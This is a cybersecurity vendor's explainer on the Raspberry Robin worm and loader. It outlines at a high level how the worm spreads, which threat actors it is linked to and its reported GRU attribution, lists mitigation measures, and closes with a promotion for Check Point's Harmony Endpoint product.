Raspberry Robin Malware: A Worm Weaponizing USBs

Raspberry Robin has evolved from a USB-delivered worm to a sophisticated and elusive multipurpose malware that spreads via a range of advanced distribution methods. With ties to the Russian state, this malware isn’t going anywhere, and organizations need a proper security strategy to stay safe.

Harmony Endpoint Cyber Security Report

Introduction to Raspberry Robin Malware

Raspberry Robin malware is an advanced downloader that was initially spread through USB drives and other removable storage devices. Acting as a USB malware in its early days, a Raspberry Robin infection would download malicious software by exploiting Windows Installer.

These campaigns have since expanded from USB malware to a number of more impactful distribution vectors, including

Discord
N-day vulnerabilities
Malicious adverts
Windows script files and command lines

The malware was identified by cybersecurity company Red Canary in September 2021 as a cluster with worm-like capabilities. Details on the Raspberry Robin Worm malware, including its naming, were first revealed in a May 2022 blog.

Since then, significant research on the malware has been conducted, with other security experts sharing their findings, including Microsoft, who identified artifacts related to Raspberry Robin dating back to 2019.

Why It’s Difficult to Analyze

While Raspberry Robin infections pose significant risks, analyzing the threat has been challenging due to:

The malware evasion techniques
Methodologies employed by the threat actor.

While USB malware is a common delivery mechanism, the Raspberry Robin Worm demonstrated sophisticated obfuscation methods and anti-analysis techniques. The threat actor now employs a range of exploits and capabilities to evade detection and sandbox security controls.

Examples include multi-layer packing with up to 14 layers.

Research has tracked the increasing number of campaigns as the malware grew from an interesting activity cluster to a widely distributed malicious downloader. But, the threat actor remains unknown, operating under a number of aliases, including:

Roshtyak
QNAP-Worm
LINK_MSIEXEC
Storm-0856
DEV-0856

Providing the initial access to a victim’s device, Raspberry Robin is utilized as a loader malware to drop other malicious software such as ransomware, stealers, and crypto miners. Observed payloads delivered by the malware include Truebot, Bumblebee, and IcedID.

How Raspberry Robin Spreads

Here’s how it spreads:

USB propagation

Early Raspberry Robin worm attacks, up until 2023, propagated through infected USB devices. Often, these USBs were previously found to have been used at print and copy shops or mailing centers.

Here’s a breakdown of USB propagation and how it infects devices to deliver malicious payloads:

The user unknowingly inserts the infected USB device into a system.
They then click on a specific file stored on the device.
Disguised as a folder, the file contains a Windows shortcut file that starts a CMD.exe process.
This process connects to command-and-control (C2) servers, transferring information about the device.
Connectivity is verified through continuous callouts to Tor nodes.
If the network connection is successful, the CMD.exe process downloads and installs the payload as a DLL with a randomly generated name.

Raspberry Robin Malware Targets

In its early days, the worm delivered through USB devices mainly targeted companies outside of the US. Countries where Raspberry Robin was most active included:

Argentina
Australia
Mexico
Croatia.

Industries targeted included:

Technology
Manufacturing
Government agencies

But, with its transition to new distribution methods, it has become more active in America.

Data from Check Point’s State of Cybersecurity Report shows it accounted for 3% of the US multipurpose malware market during 2024.

This malware now targets a large number of corporations across different industries and locations. The consensus among experts is that Raspberry Robin does not target specific industries or countries.

Evolving Distribution Methods

Although infected devices remain, analysis from 2024 indicates that Raspberry Robin no longer actively spreads as USB malware. It now launches sophisticated campaigns targeting secure corporate networks while acting as an IAB for several serious cybercrime groups.

The malware’s distribution methods now include:

Utilizing Discord to send users archive files as attachments. These archive files are a signed Windows executable that can be abused for side-loading with a DLL that contains the malicious Raspberry Robin payload.
7-Zip archive files downloaded through a web browser that contains a compromised Windows Installer that infects the device.
Since 2024, many of these attacks based on archive files have transitioned to Windows Script Files. These files are distributed via malicious domains and subdomains, as well as through malicious advertising.
Making use of 1-day or n-day exploits before they are publicly shared. Rather than zero-day threats, these are known vulnerabilities that have a short window of opportunity to be exploited. Typically, these exploits launch attacks targeting QNAP systems and IoT devices, and Raspberry Robin is thought to buy these exploits from other parties.

Connections to Other Threat Actors

Raspberry Robin malware is known to sell access to corporate networks to other threat actors. These threat actor groups include:

Clop
Evil Corp
SocGholish
Dridex
Silence (aka Whisper Spider)
LockBit

Acting as an IAB to deliver payloads from other threat actors makes it more challenging to identify its involvement. It is also thought that these collaborations with other hacking groups enable them to acquire n-day exploits rather than developing them by themselves.

In September 2024, the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the NSA released information stating that Raspberry Robin is associated with the Russian GRU, the country’s military intelligence agency.

In particular, Raspberry Robin is linked to the 161st Specialist Training Center (GRU 29155), a unit thought to be behind foreign assassinations and other activities that aim to destabilize foreign powers.

Raspberry Robin Mitigation Strategies

Raspberry Robin represents a sophisticated threat, employing a range of malware evasion techniques and obfuscation techniques that make it difficult to detect and respond to.

However, there are mitigation strategies that can help protect your business, such as:

Proactive patch management and updating all of your software as quickly as possible to reduce the window of opportunity associated with any n-day threats.
Extensive security training to teach users about potential malware distribution methods and limit their impact.
Incident response plans that conduct simulations based on Raspberry Robin malware or similar attack vectors to learn how to effectively handle potential incidents.
Monitoring network traffic utilizing behavior-based threat detection to identify attacks without needing previously studied signatures.
Network segmentation that isolates your most critical infrastructure and limits the lateral movement of malware attacks.

Cybersecurity platforms that offer extensive malware protections and comprehensive endpoint protection.

Malware Protection with Check Point

As Raspberry Robin malware evolves its distribution methods and grows in sophistication, organizations can no longer rely on traditional security strategies. They need to evolve with the threat landscape and find new security tools that meet the level of sophistication now present in multipurpose malware attacks.

Harmony Endpoint from Check Point does just that, delivering complete endpoint security to protect you.

Request a demo to see Harmony Endpoint in action or learn more by downloading its solution brief, which details the latest malware security controls.